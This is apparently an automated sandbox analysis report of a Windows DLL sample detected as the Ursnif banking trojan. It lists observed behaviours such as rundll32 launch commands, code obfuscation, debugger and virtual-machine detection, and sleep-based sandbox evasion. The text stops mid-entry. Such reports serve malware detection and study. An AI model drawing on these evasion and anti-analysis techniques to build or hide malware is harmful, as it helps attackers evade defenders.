Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2205E5		0_2_6E2205E5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2288B7		0_2_6E2288B7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2309C8		0_2_6E2309C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E2117B0		4_2_6E2117B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E224E00		4_2_6E224E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E22BE61		4_2_6E22BE61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E220DB8		4_2_6E220DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E2205E5		4_2_6E2205E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E2288B7		4_2_6E2288B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E2309C8		4_2_6E2309C8

Found potential string decryption / allocating functions

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E223290 appears 39 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E223290 appears 39 times

Uses 32bit PE files

Source: 60e40fb428612.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Classification label

Source: classification engine

Classification label: mal68.troj.winDLL@17/14@17/3

Contains functionality to enum processes or threads

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02BAA65C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_02BAA65C

Creates files inside the user directory

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Creates temporary files

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF1C465EC4A4AE6446.TMP

Jump to behavior

PE file has an executable .text section and no other executable section

Source: 60e40fb428612.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads ini files

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Runs a DLL by calling functions

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Clockcondition

Spawns processes

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\60e40fb428612.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\60e40fb428612.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Clockcondition
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\60e40fb428612.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Dogwhen
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Sing
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Wholegray
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\60e40fb428612.dll',#1			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Clockcondition			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Dogwhen			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Sing			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Wholegray			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\60e40fb428612.dll',#1			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Found GUI installer (many successful clicks)

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

PE file contains a mix of data directories often seen in goodware

Source: 60e40fb428612.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 60e40fb428612.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 60e40fb428612.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 60e40fb428612.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 60e40fb428612.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 60e40fb428612.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: 60e40fb428612.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

PE file contains a debug data directory

Source: 60e40fb428612.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:

Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, 00000000.00000002.476685729.000000006E234000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.477751077.000000006E234000.00000002.00020000.sdmp, 60e40fb428612.dll

PE file contains a valid data directory to section mapping

Source: 60e40fb428612.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 60e40fb428612.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 60e40fb428612.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 60e40fb428612.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 60e40fb428612.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1F1BAC LoadLibraryA,GetProcAddress,

0_2_6E1F1BAC

PE file contains an invalid checksum

Source: 60e40fb428612.dll

Static PE information: real checksum: 0x6292a should be: 0x6af68

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F2120 push ecx; ret		0_2_6E1F2129
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F2173 push ecx; ret		0_2_6E1F2183
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02BAABC0 push ecx; ret		0_2_02BAABC9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02BAAF6F push ecx; ret		0_2_02BAAF7F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E21DE07 push ecx; ret		0_2_6E21DE1A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E203276 push ebx; ret		0_2_6E20328A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E203244 pushad ; ret		0_2_6E203270
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2232D5 push ecx; ret		0_2_6E2232E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E202AD8 push edx; retf		0_2_6E202AD9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E20103D push cs; ret		0_2_6E20103E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2050D4 push cs; ret		0_2_6E2050DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E21DE07 push ecx; ret		4_2_6E21DE1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E205DD6 push FFFFFFB7h; iretd		4_2_6E205DFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E203276 push ebx; ret		4_2_6E20328A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E203244 pushad ; ret		4_2_6E203270
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E2232D5 push ecx; ret		4_2_6E2232E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E202AD8 push edx; retf		4_2_6E202AD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E20103D push cs; ret		4_2_6E20103E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E2050D4 push cs; ret		4_2_6E2050DD

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.375971100.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375934102.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375882980.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375768564.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375954554.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375906864.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375822644.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375857537.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6760, type: MEMORY

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: iexplore.exe, 0000001E.00000002.480400912.000001D556BD0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: iexplore.exe, 0000001E.00000002.480400912.000001D556BD0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: iexplore.exe, 0000001E.00000002.465171579.000001D552E17000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Wp
Source: iexplore.exe, 0000001E.00000002.480400912.000001D556BD0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: iexplore.exe, 0000001E.00000002.480201993.000001D55579D000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F2
Source: iexplore.exe, 0000001E.00000002.480232372.000001D5557B2000.00000004.00000001.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
Source: iexplore.exe, 0000001E.00000002.464773273.000001D552D7F000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: iexplore.exe, 0000001E.00000002.480400912.000001D556BD0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E22AFAC ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,

0_2_6E22AFAC

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E22AFAC ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,

0_2_6E22AFAC

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1F1BAC LoadLibraryA,GetProcAddress,

0_2_6E1F1BAC

Contains functionality to read the PEB

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E24E2D8 mov eax, dword ptr fs:[00000030h]		0_2_6E24E2D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E24E207 mov eax, dword ptr fs:[00000030h]		0_2_6E24E207
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E24DE0E push dword ptr fs:[00000030h]		0_2_6E24DE0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E24E2D8 mov eax, dword ptr fs:[00000030h]		4_2_6E24E2D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E24E207 mov eax, dword ptr fs:[00000030h]		4_2_6E24E207
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E24DE0E push dword ptr fs:[00000030h]		4_2_6E24DE0E

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E223484 GetProcessHeap,

0_2_6E223484

Contains functionality to register its own exception handler

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E21FEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6E21FEBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E21FEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter,		4_2_6E21FEBA

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\60e40fb428612.dll',#1

Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: loaddll32.exe, 00000000.00000002.466411899.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.474065564.0000000003340000.00000002.00000001.sdmp, iexplore.exe, 0000001E.00000002.474775486.000001D5532B0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.466411899.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.474065564.0000000003340000.00000002.00000001.sdmp, iexplore.exe, 0000001E.00000002.474775486.000001D5532B0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.466411899.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.474065564.0000000003340000.00000002.00000001.sdmp, iexplore.exe, 0000001E.00000002.474775486.000001D5532B0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.466411899.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.474065564.0000000003340000.00000002.00000001.sdmp, iexplore.exe, 0000001E.00000002.474775486.000001D5532B0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02BA9135 cpuid

0_2_02BA9135

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\System32\loaddll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,		0_2_6E22EC14
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,		0_2_6E222C5A
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		0_2_6E22D10F
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,		0_2_6E22EE88
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,		0_2_6E22EEC8
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,		0_2_6E22EF45
Source: C:\Windows\System32\loaddll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,		0_2_6E22EFC8
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,		0_2_6E222A26
Source: C:\Windows\System32\loaddll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,		0_2_6E22F2E7
Source: C:\Windows\System32\loaddll32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,		0_2_6E22CB0D
Source: C:\Windows\System32\loaddll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,		0_2_6E22AB64
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,		0_2_6E22F394
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,		0_2_6E21E036
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,		0_2_6E2229A0
Source: C:\Windows\System32\loaddll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,		0_2_6E22F1BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,		4_2_6E22EC14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,		4_2_6E222C5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		4_2_6E22D10F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,		4_2_6E22EE88
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,		4_2_6E22EEC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,		4_2_6E22EF45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,		4_2_6E22EFC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,		4_2_6E222A26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,		4_2_6E22F2E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,		4_2_6E22CB0D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,		4_2_6E22AB64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,		4_2_6E22F394
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,		4_2_6E21E036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,		4_2_6E2229A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,		4_2_6E22F1BD

Contains functionality to query local / system time

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1F1ADA GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_6E1F1ADA

Contains functionality to query the account / user name

Source: C:\Windows\System32\loaddll32.exe

